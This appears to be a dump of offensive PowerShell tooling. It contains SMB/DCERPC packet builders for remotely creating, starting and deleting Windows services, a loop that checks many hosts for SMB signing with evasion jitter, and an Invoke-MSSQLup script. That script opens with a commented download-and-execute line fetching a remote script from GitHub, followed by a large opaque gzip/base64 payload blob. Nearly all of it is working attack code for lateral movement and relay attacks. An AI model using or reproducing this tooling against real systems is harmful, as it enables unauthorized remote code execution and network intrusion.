655 |         $packet_referent_ID2 += 0x00,0x00
656 | 
657 |         $packet_SCMOpenSCManagerW = New-Object System.Collections.Specialized.OrderedDictionary
658 |         $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ReferentID",$packet_referent_ID1)
659 |         $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_MaxCount",$packet_service_length)
660 |         $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
661 |         $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ActualCount",$packet_service_length)
662 |         $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName",$packet_service)
663 |         $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_ReferentID",$packet_referent_ID2)
664 |         $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameMaxCount",[Byte[]](0x0f,0x00,0x00,0x00))
665 |         $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameOffset",[Byte[]](0x00,0x00,0x00,0x00))
666 |         $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameActualCount",[Byte[]](0x0f,0x00,0x00,0x00))
667 |         $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database",[Byte[]](0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x41,0x00,0x63,0x00,0x74,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x00,0x00))
668 |         $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Unknown",[Byte[]](0xbf,0xbf))
669 |         $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_AccessMask",[Byte[]](0x3f,0x00,0x00,0x00))
670 |     
671 |         return $packet_SCMOpenSCManagerW
672 |     }
673 | 
674 |     function Get-PacketSCMCreateServiceW()
675 |     {
676 |         param([Byte[]]$packet_context_handle,[Byte[]]$packet_service,[Byte[]]$packet_service_length,
677 |                 [Byte[]]$packet_command,[Byte[]]$packet_command_length)
678 |                 
679 |         $packet_referent_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
680 |         $packet_referent_ID = $packet_referent_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
681 |         $packet_referent_ID += 0x00,0x00
682 | 
683 |         $packet_SCMCreateServiceW = New-Object System.Collections.Specialized.OrderedDictionary
684 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ContextHandle",$packet_context_handle)
685 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_MaxCount",$packet_service_length)
686 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
687 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_ActualCount",$packet_service_length)
688 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName",$packet_service)
689 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ReferentID",$packet_referent_ID)
690 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_MaxCount",$packet_service_length)
691 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
692 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ActualCount",$packet_service_length)
693 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName",$packet_service)
694 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_AccessMask",[Byte[]](0xff,0x01,0x0f,0x00))
695 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceType",[Byte[]](0x10,0x00,0x00,0x00))
696 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceStartType",[Byte[]](0x03,0x00,0x00,0x00))
697 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceErrorControl",[Byte[]](0x00,0x00,0x00,0x00))
698 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_MaxCount",$packet_command_length)
699 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_Offset",[Byte[]](0x00,0x00,0x00,0x00))
700 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_ActualCount",$packet_command_length)
701 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName",$packet_command)
702 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer",[Byte[]](0x00,0x00,0x00,0x00))
703 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_TagID",[Byte[]](0x00,0x00,0x00,0x00))
704 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer2",[Byte[]](0x00,0x00,0x00,0x00))
705 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DependSize",[Byte[]](0x00,0x00,0x00,0x00))
706 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer3",[Byte[]](0x00,0x00,0x00,0x00))
707 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer4",[Byte[]](0x00,0x00,0x00,0x00))
708 |         $packet_SCMCreateServiceW.Add("SCMCreateServiceW_PasswordSize",[Byte[]](0x00,0x00,0x00,0x00))
709 | 
710 |         return $packet_SCMCreateServiceW
711 |     }
712 | 
713 |     function Get-PacketSCMStartServiceW()
714 |     {
715 |         param([Byte[]]$packet_context_handle)
716 | 
717 |         $packet_SCMStartServiceW = New-Object System.Collections.Specialized.OrderedDictionary
718 |         $packet_SCMStartServiceW.Add("SCMStartServiceW_ContextHandle",$packet_context_handle)
719 |         $packet_SCMStartServiceW.Add("SCMStartServiceW_Unknown",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
720 | 
721 |         return $packet_SCMStartServiceW
722 |     }
723 | 
724 |     function Get-PacketSCMDeleteServiceW()
725 |     {
726 |         param([Byte[]]$packet_context_handle)
727 | 
728 |         $packet_SCMDeleteServiceW = New-Object System.Collections.Specialized.OrderedDictionary
729 |         $packet_SCMDeleteServiceW.Add("SCMDeleteServiceW_ContextHandle",$packet_context_handle)
730 | 
731 |         return $packet_SCMDeleteServiceW
732 |     }
733 | 
734 |     function Get-PacketSCMCloseServiceHandle()
735 |     {
736 |         param([Byte[]]$packet_context_handle)
737 | 
738 |         $packet_SCM_CloseServiceW = New-Object System.Collections.Specialized.OrderedDictionary
739 |         $packet_SCM_CloseServiceW.Add("SCMCloseServiceW_ContextHandle",$packet_context_handle)
740 | 
741 |         return $packet_SCM_CloseServiceW
742 |     }
743 | 
744 |     $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
745 |     $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
746 |     $process_ID = $process_ID -replace "-00-00",""
747 |     [Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
748 | 
749 |     function Get-SMBSigningStatus
750 |     {
751 |         param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version)
752 | 
753 |         if($SMB_relay_socket)
754 |         {
755 |             $SMB_relay_challenge_stream = $SMB_relay_socket.GetStream()
756 |         }
757 |         
758 |         $SMB_client_receive = New-Object System.Byte[] 1024
759 |         $SMB_client_stage = "NegotiateSMB"
760 |         
761 |         :SMB_relay_challenge_loop while($SMB_client_stage -ne "exit")
762 |         {
763 |         
764 |             switch ($SMB_client_stage)
765 |             {
766 | 
767 |                 "NegotiateSMB"
768 |                 {
769 |                     $packet_SMB_header = Get-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes 0x00,0x00       
770 |                     $packet_SMB_data = Get-PacketSMBNegotiateProtocolRequest $SMB_version
771 |                     $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
772 |                     $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
773 |                     $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
774 |                     $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
775 | 
776 |                     $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
777 |                     $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
778 |                     $SMB_relay_challenge_stream.Flush()    
779 |                     $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
780 | 
781 |                     if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq "ff-53-4d-42")
782 |                     {
783 |                         $SMB_version = "SMB1"
784 |                         $SMB_client_stage = "NTLMSSPNegotiate"
785 |                     }
786 |                     else
787 |                     {
788 |                         $SMB_client_stage = "NegotiateSMB2"
789 |                     }
790 | 
791 |                     if(($SMB_version -eq "SMB1" -and [System.BitConverter]::ToString($SMB_client_receive[39]) -eq "0f") -or ($SMB_version -ne "SMB1" -and [System.BitConverter]::ToString($SMB_client_receive[70]) -eq "03"))
792 |                     {
793 |                         $SMBSigningStatus = $true
794 |                         
795 |                     } else {
796 |                         $SMBSigningStatus = $false
797 |                     }
798 |                     $SMB_relay_socket.Close()
799 |                     $SMB_client_receive = $null
800 |                     $SMB_client_stage = "exit"
801 | 
802 |                 }
803 |             
804 |             }
805 | 
806 |         }
807 |         return $SMBSigningStatus
808 |     }
809 | 
810 |     if($Target) {
811 |         $Targets += $Target
812 |     }
813 |     foreach ($Target in $Targets) {
814 |         $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
815 |         $SMB_relay_socket.Client.ReceiveTimeout = $Timeout
816 |         $SMB_relay_socket.Connect($Target,"445")
817 |         $HTTP_client_close = $false
818 |         if(!$SMB_relay_socket.connected)
819 |         {
820 |         "$Target is not responding"
821 |         }
822 |         $SigningStatus = Get-SMBSigningStatus $SMB_relay_socket "smb2"
823 |         if ($SigningStatus){
824 |             "Signing Enabled"
825 |         } else {
826 |             "Signing Not Required"
827 |         }
828 |         if ($Delay) {
829 |             $Jitter = get-random -Minimum 0 -Maximum $DelayJitter
830 |             sleep ($Delay+$Jitter)
831 |         }
832 |     }
833 | 
834 | }
835 | 


--------------------------------------------------------------------------------
/Invoke-MSSQLup.ps1:
--------------------------------------------------------------------------------
 1 | #IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1")
 2 | Function Invoke-MSSQLup {
 3 |     param ($Command)
 4 | $b64Str = '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